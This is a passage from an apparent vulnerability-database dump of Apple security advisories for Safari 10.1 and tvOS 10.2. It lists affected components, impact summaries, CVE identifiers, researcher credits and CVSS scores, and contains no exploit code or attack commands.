10.12.4\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: an anonymous researcher\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2392: Max Bazaliy of Lookout\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nEntry added March 30, 2017\n\n**WebKit**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7071: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative \n\nEntry added August 23, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: OS X Yosemite v10.10.5, OS X El Capitan v10.11.6, and macOS Sierra 10.12.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Webkit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of Safari 10.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2385", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2392", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2405", "CVE-2017-2415", "CVE-2017-2419", "CVE-2017-2424", "CVE-2017-2433", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2457", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2486", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-7071"], "modified": "2017-03-27T00:00:00", "id": "APPLE:581D1ADF40E75038A35B5C18CE7EDD03", "href": "https://support.apple.com/kb/HT207600", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-01T00:00:00", "description": "# About the security content of tvOS 10.2\n\nThis document describes the security content of tvOS 10.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: natashenka of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of tvOS 10.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2367", "CVE-2017-2379", "CVE-2017-2386", "CVE-2017-2390", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2401", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2485", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029"], "modified": "2017-03-27T00:00:00", "id": "APPLE:C3300089BE0D932332C0D20113B0C302", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:40", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 10.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with 